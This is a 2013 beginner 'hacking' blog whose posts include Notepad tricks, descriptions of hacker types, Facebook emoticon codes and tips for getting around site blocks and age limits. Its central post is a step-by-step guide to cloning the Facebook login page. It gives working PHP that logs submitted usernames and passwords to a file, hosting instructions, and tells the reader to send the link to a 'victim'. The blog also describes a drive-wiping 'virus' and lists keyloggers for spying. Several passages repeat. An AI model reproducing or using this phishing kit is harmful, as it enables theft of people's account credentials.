If you want to learn to hake and want to learn new hacking tips and tricks you've come to the right place! With our easy step by step tutorials you'll be a pro hacker in no time.
Wednesday, 21 August 2013
Friday, 2 August 2013
Make your computer say anything you want it to using Notepad! Talking PC
1. Open Notepad and copy the code below.
CreateObject("SAPI.SpVoice").Speak"say this"
2. IT should look like the pic below
3. Now save the file you can name it anything you want just make sure it has a ' .vbs ' for example : speak.vbs
4. You can replace the 'say this' with anything you want your computer to say CreateObject("SAPI.SpVoice").Speak"say this"
5. Now if you open the file you computer is going to say what you typed, depending on the gender of your pc you will hear a male or female voice (yes computer has a gender!!!!!)
Awesome looking Matrix hacking code effect using Notepad
1. Open Notepad and copy the code below.
@echo off
color 0A
:A
echo b r E w e 4 e T r 8 M e F r a c h a S t 3 D a C r a s p e s T e 4 h 2 w r e G 2
ping -w .9 >nul
echo R E 9 8 8 R a t r e g 6 n u m A b R E X e Y A T u C 7 a D R a c r u C e B E p e
ping -w .9 >nul
echo c E B E s A d R u B R 3 H e R u D 7 g u d U 7 T a b u T 5 e p E 2 a v e 6 8 a Z
ping -w .9 >nul
echo n u r A X a j a s t a 9 h a 6 e h e G a s u t r a t r A y a f E q u 8 u b R u d
ping -w .9 >nul
echo k u v e 4 E 6 3 e t r a d r e f e y e q e 6 U H e z U b r u R a s 2 4 3 r A N a
ping -w .9 >nul
echo v u P R a b R u c e d U s w a h a c r a t h U 7 r a h u t u h u V e 7 U k u S a
ping -w .9 >nul
echo T e D r e 8 A p r a d a b u f U c u c E h E t 7 c r 5 s P a f r e t h u t 9 u t
ping -w .9 >nul
echo b R u G e p a R e s a P H e P a 2 U d 4 P r e F A b a t h a t h U s w a d R U d
ping -w .9 >nul
echo v U Y a C R e T R 9 k u b e D r a T 6 u j e 5 2 4 e B a f 2 u b 5 w A p a y U Y
ping -w .9 >nul
echo b r E w e 4 e n r 8 M e F r a c h a S t 3 D a C r a s p e s T e 4 a 2 w r e G 2
ping -w .9 >nul
echo k u v e 4 E 6 3 e t r a d r e f e y e q e 6 U H e z U b r u R a s 2 4 3 r A N a
ping -w .9 >nul
echo v u P R a b s u c e d U s w a 3 a c r a t h U 7 r a k u t u h u V e 7 U k u S a
ping -w .9 >nul
echo n u r A X a j a s t a 9 h a 6 e h e G a s u t r a t r A y a f E q u 8 u b u u d
ping -w .9 >nul
goto A
2. It should look like the pic below.
3. Now save it, you can give it any name you want just make sure it is ' .bat ' for example matrix.bat
4. Open the program and it should look like the pic below
Types of Hackers
There are thee types of hackers white hat, grey hat, and black hat hackers.
A White Hat (or, more properly, a "computer security specialist" or similar) will NEVER attempt to break into a system that they do not own or do not have explicit permission from the owner to do so. That means, they will usually be hired by a system or software owner to test the security of the said system or software package. They will always report their findings to the owner of the system, though there is somewhat of an ethical responsibility to report any significant (i.e. things that would impact the public) exploits to the community-at-large, if the original owner does not seem to be willing to address the issues - e.g. in case of a coverup of the problem, a White Hat is generally ethically bound to report the problem to the proper authorities, which may include public organizations such as CERT. More concisely, a White Hat is a professional, who abides by professional ethics and performs his or her duties out in the open.
Grey Hat folks generally don't have obvious ill intent (to contradict the previous answer). That is, they're not looking to exploit any problems for personal gain. However, they generally follow an ethic which believes that it is OK to perform intrusion and exploit scans on systems which they DON'T own or have permission to do so. This makes it hard for a target to determine the difference between a Grey and Black Hat hacker, as the initial method of operation looks identical. That said, Grey Hat folks generally report their findings to the target - that is, they'll inform the target as to what security issues they have found. Most Grey Hats will give the target a small window to address the issues; however, a GH will always report the issue to the wider media and security groups, and will NOT consider any information that the target wants to keep private. That is, GH folks seem to see themselves as "defenders of the public good", and that by exposing weaknesses of systems, they will ultimately force folks to be more secure. This is a plausible, but not provably true, scenario. Grey Hat folks are hobbiests and enthusiasts, who generally don't get paid for their work, but pursue it for personal reasons. They generally keep their identities masked (or at least don't usually broadcast them), as much of their work is quasi-illegal.
Black Hat folks, of course, are in it for the money (one way or the other). They're targets will never be informed of breaches, and in fact, most BH folks strive to keep their exploits secret from everyone, as it allows them to sneak in and steal information of value undetected. Black Hat folks are pure criminals.
There are thee types of hackers white hat, grey hat, and black hat hackers.
A White Hat (or, more properly, a "computer security specialist" or similar) will NEVER attempt to break into a system that they do not own or do not have explicit permission from the owner to do so. That means, they will usually be hired by a system or software owner to test the security of the said system or software package. They will always report their findings to the owner of the system, though there is somewhat of an ethical responsibility to report any significant (i.e. things that would impact the public) exploits to the community-at-large, if the original owner does not seem to be willing to address the issues - e.g. in case of a coverup of the problem, a White Hat is generally ethically bound to report the problem to the proper authorities, which may include public organizations such as CERT. More concisely, a White Hat is a professional, who abides by professional ethics and performs his or her duties out in the open.
Grey Hat folks generally don't have obvious ill intent (to contradict the previous answer). That is, they're not looking to exploit any problems for personal gain. However, they generally follow an ethic which believes that it is OK to perform intrusion and exploit scans on systems which they DON'T own or have permission to do so. This makes it hard for a target to determine the difference between a Grey and Black Hat hacker, as the initial method of operation looks identical. That said, Grey Hat folks generally report their findings to the target - that is, they'll inform the target as to what security issues they have found. Most Grey Hats will give the target a small window to address the issues; however, a GH will always report the issue to the wider media and security groups, and will NOT consider any information that the target wants to keep private. That is, GH folks seem to see themselves as "defenders of the public good", and that by exposing weaknesses of systems, they will ultimately force folks to be more secure. This is a plausible, but not provably true, scenario. Grey Hat folks are hobbiests and enthusiasts, who generally don't get paid for their work, but pursue it for personal reasons. They generally keep their identities masked (or at least don't usually broadcast them), as much of their work is quasi-illegal.
Black Hat folks, of course, are in it for the money (one way or the other). They're targets will never be informed of breaches, and in fact, most BH folks strive to keep their exploits secret from everyone, as it allows them to sneak in and steal information of value undetected. Black Hat folks are pure criminals.
Hackers can
also be divided in to groups as follow
- Type A (rookie hacker): This type of hacker is interested in new technology and hacks that others are preforming. What distinguishes these hackers from others is that they simply don't have the amount of computer expertise to preform many/any hacks. Every hacker starts out as a Type A.
- Type B (beginner): Has the know-how to solve basic/intermediate computer problems and write basic programs. If you are a Type B hacker, you will make numerous mistakes, some minor, some fatal.
- Type C (intermediate hacker): Comfortable fiddling with hardware and software alike. Likes to build computers, root cell phones and tablets, and test all electronic devices to their limits. Most Type C, D, and E hackers have their own websites and networks.
- Type D (expert hacker): King of all other hackers. Can hack almost any piece of software or hardware in almost every way imaginable. Becoming a Type D hacker takes a lot of practice and dedication.
- Type E (Business hacker): Turns computer knowledge into cash. Type E hackers can do things for money such as rooting devices, selling custom operating systems and programs, and fixing computer problems. These people are most often also Type C or D hackers.
- Type F (illegal hacker): Called "crackers" by some, you do not want to be one of these.
New Facebook smileys for chats
[[f9.laugh]]
[[f9.sad]]
[[f9.angry]]
[[f9.sleepy]]
[[f9.shock]]
[[f9.kiss]]
[[f9.inlove]]
[[f9.pizza]]
[[f9.coffee]]
[[f9.rain]]
[[f9.bomb]]
[[f9.sun]]
[[f9.heart]]
[[f9.heartbreak ]]
[[f9.doctor]]
[[f9.ghost]]
[[f9.brb]]
[[f9.wine]]
[[f9.gift]]
[[f9.adore]]
[[f9.angel]]
[[f9.baloons]]
[[f9.bowl]]
[[f9.cake]]
[[f9.callme]]
[[f9.clap]]
[[f9.confused]]
[[f9.curllip]]
[[f9.devilface] ]
[[f9.lying]]
Thursday, 1 August 2013
Learn how to make a virus
1. Open Notepad and copy the code below into it.
2. Now save the file virus.bat, you can name it anything you want just make sure it is ' .bat '
3. Done! you created your very own virus.
.Running this file will delete all content of Drive C. I recommend not trying this on yourself.
I will not be responsible for any damage on your computer, this is for educational purposes only.
Keyloggers
1. REFOG Free Keylogger
2. Revealer Keylogger Free Edition
3. Quick FREE Keylogger
4. Actual Keylogger
5. 007 Keylogger
A keylogger is a type of surveillance
software(considered to be either software or spyware) that has the capability
to record every keystroke you make to a log file, ussually encrypted. A
keylogger recorder can record instant messages, e-mails, and any information
you type at any time using your keyboard. The log file created by the keylogger
can then be sent to a specified receiver. Some keylogger programs will also
record any e-mail addresses you use and Website URLs you visit.
Be on the lookout for a tutorial on how to set up your own keylogger.
Here is a list of the 5 best keylogger software you can take a look at so long.
2. Revealer Keylogger Free Edition
3. Quick FREE Keylogger
4. Actual Keylogger
5. 007 Keylogger
Accessing a blocked website through the IP address
In this tutorial I will teach you how to access a blocked website.
1. First we need to get the IP address of the page you want to access. Go
to Start > Type CMD and press Enter.
2. Open the program and type ‘PING’ followed
by the website URL you want the IP address of.
4. Enter the IP address in your browser and you should be able to access the blocked site.
2. Open the program and type ‘PING’ followed
by the website URL you want the IP address of.
Watch 18+ Videos On YouTube Without Signing In
Tired of seeing 'Sorry, this content is age restricted'? Here is the simple and easy solution!!
1. First get the Url of video you want to watch. As shown below.
2. Then copy the Id of the video this one is V5ZRmba8dTg.
3. Now paste the video Id in the link shown below.( Replace the VideoId with the one you copied in step 2)
4. Now the url will become like the one shown below
5. Done.
How to hack Facebook with phishing page
Phishing is a illegal activity so don't try this on anyone.This tutorial is for educational purpose only.
Not only Facebook you can make a phishing page of any website by following these steps.
You can hack Gmail,Yahoo,Orkut,Twitter and loads more!
Have fun ;)
Phishing is a illegal activity so don't try this on anyone.This tutorial is for educational purpose only.
Not only Facebook you can make a phishing page of any website by following these steps.
You can hack Gmail,Yahoo,Orkut,Twitter and loads more!
Have fun ;)
Phishing is attempting to acquire information (and sometimes, indirectly, money) such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by e-mail spoofing or instant messaging,and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users, and exploits the poor usability of current web security technologies. Attempts to deal with the growing number of reported phishing incidents includelegislation, user training, public awareness, and technical security measures.
today we create a facebook phishing page which look similar to a facebook page but it's not actually a facebook page,when victim enter his username and password you will be able to see that.Interesting.....
steps to create a phishing page:
1.Go to the Facebook page ,and then right click on the page, u will see the option view source page,click on that.
2.now a new tab will open which contain a source code,Select all the stuff and paste it in a notepad.
4.You will have to find a text which looks like ..
action="https://www.facebook.com/login.php?login_attempt=1"
5.delete all the text written in red colour and instead of it write post.php.then it will look like...
action="post.php"
6.Now save it on your desktop with the name index.htm,not index.html,remember.
7.Now your phishing page is ready.it will look like a pic given below .
8.Open a new notepad and save the given data with the name post.php.
<?php
header ('Location:http://www.facebook.com/');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
9.You have two files now one is index.htm and another is post.php,remember file extension is important.
10.Now u have to upload it in a web hosting site ,i prefer u to use www.000webhost.com or else www.,my3gb.com.
11.I prefer u to use 000webhost because it will be easy to use.
12.You have to make a account in that ,after that it looks like a picture given below.
13.Now go control pannel,then on file manager.
14.After that a new window will pop up.Now go to public_html.
15.Delete the file named default.php,after that upload two files index.htm and post.php one by one .
16.Now the last step click on view of index.htm it will look same as facebook page.
17.Copy the url of that page and send this link to your victim,when your victim try to login in to it with the username and password .the page redirectly connect to facebook. and you will be now able to see his password.
18.Open your 000webhost account and go to file manager then public_html,here you find a new file named username.txt.
19.Click on view now u will have your friend's password and email id.
index |
8.Open a new notepad and save the given data with the name post.php.
<?php
header ('Location:http://www.facebook.com/');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
9.You have two files now one is index.htm and another is post.php,remember file extension is important.
10.Now u have to upload it in a web hosting site ,i prefer u to use www.000webhost.com or else www.,my3gb.com.
11.I prefer u to use 000webhost because it will be easy to use.
12.You have to make a account in that ,after that it looks like a picture given below.
13.Now go control pannel,then on file manager.
14.After that a new window will pop up.Now go to public_html.
15.Delete the file named default.php,after that upload two files index.htm and post.php one by one .
16.Now the last step click on view of index.htm it will look same as facebook page.
this is your Facebook phishing page |
17.Copy the url of that page and send this link to your victim,when your victim try to login in to it with the username and password .the page redirectly connect to facebook. and you will be now able to see his password.
18.Open your 000webhost account and go to file manager then public_html,here you find a new file named username.txt.
19.Click on view now u will have your friend's password and email id.
Subscribe to:
Posts (Atom)